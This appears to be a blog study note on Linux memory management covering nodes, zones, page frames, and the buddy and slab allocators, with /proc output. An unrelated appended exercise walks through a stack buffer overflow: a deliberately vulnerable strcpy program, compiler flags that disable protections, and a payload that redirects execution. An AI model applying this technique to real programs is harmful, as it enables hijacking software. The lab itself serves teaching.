Linux Memory Management

Memory management techniques and virtual memory

  • Virtual memory gives each Task a Virtual Address Space of the maximum size the CPU can address.

    CPU      Size
    32bit    4GB
    64bit    16EB

    • On a 32bit CPU, the Virtual Address Space of a Task does not need 4GB of physical memory; it takes only as much physical memory as the Task actually uses.
      • More tasks can run with less physical memory
      • No need for a memory arrangement policy
      • Easy to share or protect memory between tasks
      • Fast task creation
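
The sizes in the table follow from the address width: an n-bit address can name 2^n bytes. The following is a minimal sketch of that arithmetic; the function name `address_space_units` is made up for this illustration.

```c
#include <stdint.h>

/* Number of unit-sized chunks addressable with `bits` address bits.
 * unit_log2 is log2 of the unit size in bytes (30 for GB, 60 for EB).
 * Counting in units avoids overflowing uint64_t for a 64-bit space.
 * Assumes bits >= unit_log2 and bits - unit_log2 < 64. */
uint64_t address_space_units(unsigned bits, unsigned unit_log2)
{
    return (uint64_t)1 << (bits - unit_log2);
}
```

Calling `address_space_units(32, 30)` gives 4 (GB) and `address_space_units(64, 60)` gives 16 (EB), matching the table.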

Physical memory management data structure

  • Linux keeps information about the entire physical memory.
  • UMA(Uniform Memory Access): SMP(Symmetric Multi-Processing)
    • Memory and the I/O bus are shared by all CPUs
    • The shared resources can become a bottleneck
  • NUMA(Non-Uniform Memory Access)
    • For performance, each CPU should fetch data from the memory nearest to it.
  • Node
    • Implementation of a Bank (a set of memory with the same access speed)
      • Zone structure implemented in “/include/linux/mmzone.h”
      • UMA has one Bank and NUMA has multiple Banks.
    • UMA has one Node
      • The single Node can be accessed through “contig_page_data”
    • NUMA has multiple Nodes.
      • They are managed using a list called “pgdat_list”
    • Linux accesses physical memory through the same Node structure regardless of the system type.
      • The “pg_data_t” structure is used.
        • “node_present_pages”: actual size of the physical memory in the node, counted in page frames
        • “node_start_pfn”: the page frame number at which the node's physical memory starts in the memory map
        • “node_zones”: zone structures
        • “nr_zones”: the number of zones
      • For performance
        • Linux tends to allocate memory from the Node nearest to the CPU running the Task.
        • Linux tends to schedule a Task again on the CPU that previously ran it.

      Bank-Node

  • Zone
    • Some ISA bus-based devices can only use the region of physical memory below 16MB.
    • Zones are the regions into which the physical memory of a Node is divided.
      • “/include/linux/mmzone.h”
    • Memory in the same zone has the same properties.
    • Memory in different zones is managed separately.

    Region       Zone name                Description
    0 ~ 16M      ZONE_DMA or ZONE_DMA32   reserved for some ISA bus-based devices
    16 ~ 896M    ZONE_NORMAL              mapped from the beginning of the Kernel Space in the Virtual Address Space (e.g. 3072 ~ 3968 M for 32bit)
    896M ~ end   ZONE_HIGHMEM             dynamically mapped as needed

    • The regions above describe a 32bit system. In the 64bit /proc/zoneinfo output below, ZONE_DMA32 starts at 16MB (start_pfn 4096) and covers memory up to 4GB, and there is no ZONE_HIGHMEM.
    • A Node may contain only one Zone. (e.g. ARM CPU system with 64MB SDRAM)
    • The Zone structure has
      • The start address and the size of the physical memory that belongs to the Zone
      • The free_area structure array used by Buddy
      • “watermark” and “vm_stat”, which determine the appropriate memory freeing policy on memory shortage.
        • On memory shortage, processes that failed to get memory are put into a “wait_queue”, hashed through the “wait_table” variable.
    
    $ cat /proc/zoneinfo
    Node 0, zone      DMA
      per-node stats
          nr_inactive_anon 62122
          nr_active_anon 94246
          nr_inactive_file 146827
          nr_active_file 95508
          nr_unevictable 0
          nr_slab_reclaimable 6632
          nr_slab_unreclaimable 8974
          nr_isolated_anon 0
          nr_isolated_file 0
          workingset_refault 0
          workingset_activate 0
          workingset_nodereclaim 0
          nr_anon_pages 92309
          nr_mapped    38734
          nr_file_pages 300632
          nr_dirty     19570
          nr_writeback 0
          nr_writeback_temp 0
          nr_shmem     64526
          nr_shmem_hugepages 0
          nr_shmem_pmdmapped 0
          nr_anon_transparent_hugepages 88
          nr_unstable  0
          nr_vmscan_write 0
          nr_vmscan_immediate_reclaim 0
          nr_dirtied   43945
          nr_written   20874
      pages free     3721
              min      39
              low      48
              high     57
              spanned  4095
              present  3743
              managed  3721
              protection: (0, 3857, 6164, 6164)
          nr_free_pages 3721
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          nr_zone_inactive_file 0
          nr_zone_active_file 0
          nr_zone_unevictable 0
          nr_zone_write_pending 0
          nr_mlock     0
          nr_page_table_pages 0
          nr_kernel_stack 0
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 1
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 2
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 3
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 4
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 5
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 6
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 7
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
      node_unreclaimable:  0
      start_pfn:           1
    Node 0, zone    DMA32
      pages free     988431
              min      10549
              low      13186
              high     15823
              spanned  1044480
              present  1011712
              managed  988823
              protection: (0, 0, 2306, 2306)
          nr_free_pages 988431
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          nr_zone_inactive_file 0
          nr_zone_active_file 0
          nr_zone_unevictable 0
          nr_zone_write_pending 0
          nr_mlock     0
          nr_page_table_pages 0
          nr_kernel_stack 0
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 11
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 2
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 3
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 4
                  count: 365
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 5
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 6
                  count: 16
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 7
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
      node_unreclaimable:  0
      start_pfn:           4096
    Node 0, zone   Normal
      pages free     158188
              min      6306
              low      7882
              high     9458
              spanned  619520
              present  619520
              managed  590396
              protection: (0, 0, 0, 0)
          nr_free_pages 158188
          nr_zone_inactive_anon 62122
          nr_zone_active_anon 94246
          nr_zone_inactive_file 146827
          nr_zone_active_file 95508
          nr_zone_unevictable 0
          nr_zone_write_pending 19570
          nr_mlock     0
          nr_page_table_pages 731
          nr_kernel_stack 7536
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 373
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 333
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 2
                  count: 317
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 3
                  count: 282
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 4
                  count: 369
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 5
                  count: 327
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 6
                  count: 268
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 7
                  count: 123
                  high:  378
                  batch: 63
      vm stats threshold: 48
      node_unreclaimable:  0
      start_pfn:           1048576
    Node 0, zone  Movable
      pages free     0
              min      0
              low      0
              high     0
              spanned  0
              present  0
              managed  0
              protection: (0, 0, 0, 0)
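
The `pages free`, `min`, `low` and `high` fields in the output above are the inputs to the watermark policy mentioned earlier. Roughly, the kernel starts background reclaim when free pages fall below `low` and makes the allocating task reclaim memory itself below `min`. The sketch below only classifies a zone against its watermarks; the type and function names are hypothetical, and the kernel's real checks take more factors into account.

```c
/* Hypothetical names for illustration; not kernel identifiers. */
enum zone_pressure {
    PRESSURE_NONE,        /* free >= high */
    PRESSURE_BELOW_HIGH,  /* low <= free < high */
    PRESSURE_BELOW_LOW,   /* min <= free < low: background reclaim expected */
    PRESSURE_BELOW_MIN    /* free < min: allocations must reclaim first */
};

struct zone_marks {
    unsigned long free;   /* "pages free" */
    unsigned long min;
    unsigned long low;
    unsigned long high;
};

enum zone_pressure classify_zone(const struct zone_marks *z)
{
    if (z->free < z->min)
        return PRESSURE_BELOW_MIN;
    if (z->free < z->low)
        return PRESSURE_BELOW_LOW;
    if (z->free < z->high)
        return PRESSURE_BELOW_HIGH;
    return PRESSURE_NONE;
}

/* Convert a page count to KiB, assuming 4 KiB page frames. */
unsigned long pages_to_kib(unsigned long pages)
{
    return pages * 4;
}
```

With the DMA32 values from the output (free 988431, min 10549, low 13186, high 15823) the zone is well above its `high` watermark, and the 3721 free pages of the DMA zone correspond to 14884 KiB.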
    
  • Page frame
    • The unit in which a Zone manages physical memory
    • Page structure implemented in “/include/linux/mm_types.h”
    • A Page structure is created for every page frame when the system boots.
    • Pages can be accessed through the global variable “mem_map”
  • Linux’s physical memory management units
    • Physical memory is composed of one or more Nodes.
    • A Node is composed of one or more Zones.
    • A Zone is composed of many Page frames.

    Node-Zone
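
The Node, Zone and Page frame hierarchy can be modelled with a toy data structure. This is a simplified sketch and not the kernel's `pg_data_t` or zone structure: the `toy_*` types and `zone_of_pfn` are invented for illustration, and the zone boundaries are copied from the `start_pfn` and `spanned` fields of the /proc/zoneinfo output above.

```c
#include <stddef.h>

struct toy_zone {
    const char   *name;
    unsigned long start_pfn;  /* first page frame number in the zone */
    unsigned long spanned;    /* page frames covered, holes included */
};

struct toy_node {
    const struct toy_zone *zones;
    size_t                 nr_zones;
};

/* Zone layout of Node 0, taken from the zoneinfo output. */
const struct toy_zone node0_zones[] = {
    { "DMA",    1,       4095    },
    { "DMA32",  4096,    1044480 },
    { "Normal", 1048576, 619520  },
};
const struct toy_node node0 = { node0_zones, 3 };

/* Return the name of the zone containing pfn, or NULL if no zone spans it. */
const char *zone_of_pfn(const struct toy_node *node, unsigned long pfn)
{
    for (size_t i = 0; i < node->nr_zones; i++) {
        const struct toy_zone *z = &node->zones[i];
        if (pfn >= z->start_pfn && pfn - z->start_pfn < z->spanned)
            return z->name;
    }
    return NULL;
}
```

For example, page frame 4096 (the 16MB boundary with 4KB page frames) is the first frame of DMA32, and page frame 1048576 (the 4GB boundary) is the first frame of Normal.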

Buddy and Slab

  • Linux allocates physical memory to tasks in units of “Page frames”.
    • A page frame is typically 4KB; depending on the architecture and configuration it can be larger (8KB, 2MB, etc.).
    • External Fragmentation: free page frames are scattered, so a request for several contiguous page frames can fail even though enough memory is free in total.
    • Internal Fragmentation: a task requests less than one page frame, so the rest of the allocated page frame is wasted.
  • Buddy Allocator
    • Reduces External Fragmentation
    • Implemented through the free_area structure array in the Zone structure (one Buddy for one Zone)
      • free_area structure has
        • free_list
        • map

        free_area

        • The number of free_area entries equals the number of power-of-two block sizes, up to the maximum number of page frames one buddy block can hold. (e.g. 4KB, 8KB, 16KB, …, 4MB)
    • Example
      • When 2 pages are requested

        Buddy allocator procedure 1

      • When another 2 pages are requested

        Buddy allocator procedure 2

      • When page 11 is freed

        Buddy allocator procedure 3

    • Lazy Buddy

      Lazy Buddy

      • “free_area::map” -> “free_area::nr_free”: the bitmap is replaced by the number of free blocks of that size
      
      $ cat /proc/buddyinfo
      Node 0, zone      DMA      1      0      0      1      2      1      1      0      0      1      3
      Node 0, zone    DMA32      3      2      4      3      6      4      4      4      3      1    963
      Node 0, zone   Normal     54    244    185    109     41     22      7      3      2      9    145
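
Each column of /proc/buddyinfo is the number of free blocks of one size, starting with single page frames and doubling with every column. The sketch below shows the arithmetic behind the buddy scheme: the block size (order) needed for a request, the index of a block's buddy, and the total free page frames in one row. The function names are made up for this example and the code is not taken from the kernel.

```c
#include <stddef.h>

/* Smallest order k such that 2^k page frames cover the request. */
unsigned order_for_pages(unsigned long pages)
{
    unsigned order = 0;
    while ((1UL << order) < pages)
        order++;
    return order;
}

/* Index of the buddy of the block that starts at page_idx and has
 * 2^order page frames: the two buddies differ only in bit `order`. */
unsigned long buddy_of(unsigned long page_idx, unsigned order)
{
    return page_idx ^ (1UL << order);
}

/* Total free page frames in one buddyinfo row, where counts[k] is the
 * number of free blocks of 2^k page frames. */
unsigned long free_pages_in_row(const unsigned long *counts, size_t n)
{
    unsigned long total = 0;
    for (size_t k = 0; k < n; k++)
        total += counts[k] << k;
    return total;
}
```

Applied to the DMA row above (1 0 0 1 2 1 1 0 0 1 3), `free_pages_in_row` yields 3721, which matches the `pages free` value of the DMA zone in /proc/zoneinfo. `buddy_of(11, 0)` is 10, so freeing page 11 can merge it with page 10 when that page is also free.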
      
  • Slab Allocator
    • Reduces Internal Fragmentation
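
The basic idea behind a slab-style allocator is to pack many objects of the same size into one page frame instead of giving each small object a page frame of its own. The sketch below only compares the wasted bytes in the two cases; it assumes 4KB page frames, ignores the bookkeeping a real slab needs, and uses hypothetical function names.

```c
#include <stddef.h>

#define PAGE_SIZE_BYTES 4096u  /* assumed page frame size */

/* Bytes wasted when one object gets a whole page frame to itself.
 * Assumes 0 < obj_size <= PAGE_SIZE_BYTES. */
size_t waste_page_per_object(size_t obj_size)
{
    return PAGE_SIZE_BYTES - obj_size;
}

/* Number of equally sized objects that fit into one page frame. */
size_t objects_per_page(size_t obj_size)
{
    return PAGE_SIZE_BYTES / obj_size;
}

/* Bytes left over in the page frame after packing as many objects as fit. */
size_t waste_when_packed(size_t obj_size)
{
    return PAGE_SIZE_BYTES % obj_size;
}
```

For a 100-byte object, a page frame per object wastes 3996 bytes each time, while packing fits 40 objects into one page frame and leaves only 96 bytes unused.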

Exercise 2. Answer: Understanding Stack based buffer overflow

#include <string.h>
#include <stdio.h>

/* Never called directly; reached only by overwriting a return address. */
void function2() {
  printf("Execution flow changed\n");
}

void function1(char *str){
  char buffer[5];
  strcpy(buffer, str);  // break point 1. (unbounded copy, intentionally vulnerable)
}                       // break point 2.

int main(int argc, char *argv[])
{
  function1(argv[1]);   // break point 3.
  printf("Executed normally\n");
  return 0;
}
gcc -g -fno-stack-protector -z execstack -o bufferoverflow overflow.c
  • -g tells GCC to add debugging information for GDB
  • -fno-stack-protector turns off the stack protection mechanism
  • -z execstack makes the stack executable
$ ./bufferoverflow AAAA
Executed normally
$ ./bufferoverflow AAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
  • break point 3.

    break point 3.

  • break point 1.

    break point 1.

  • break point 2.

    break point 2.

  • Return address, EBP and ESP on function stack frame

    EBP and ESP on function stack frame

  • break point 3.

    When you overwrite the return address with As, you get a segmentation fault with the message 0x41414141 in ?? () in GDB (0x41 is the ASCII code of 'A'). This means you have successfully overwritten the return address.

    break point 3.

  • Hijacking Execution

    • Find the function2 address

      function 2 address

    • Overwrite the Return address with the function 2 address

      run with function 2 address

    
    $ ./bufferoverflow $(python -c 'print "A"*17 + "\x1b\x84\x04\x08"')
    Execution flow changed
    Segmentation fault
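
The argument passed above is 17 filler bytes followed by the address of function2 in little-endian byte order, so the bytes \x1b\x84\x04\x08 stand for 0x0804841b. A minimal sketch of building the same byte sequence in C follows. `build_payload` is a hypothetical helper, and both the padding length and the address come from the author's build and will differ on other systems.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Write `pad` filler bytes ('A') followed by addr in little-endian order.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t out_len, size_t pad, uint32_t addr)
{
    if (out_len < pad + 4)
        return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++)
        out[pad + i] = (unsigned char)(addr >> (8 * i));  /* lowest byte first */
    return pad + 4;
}
```

Calling `build_payload(buf, sizeof buf, 17, 0x0804841b)` fills `buf` with the same 21 bytes that the Python one-liner prints, without the trailing newline.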
    
This post is licensed under CC BY 4.0 by the author.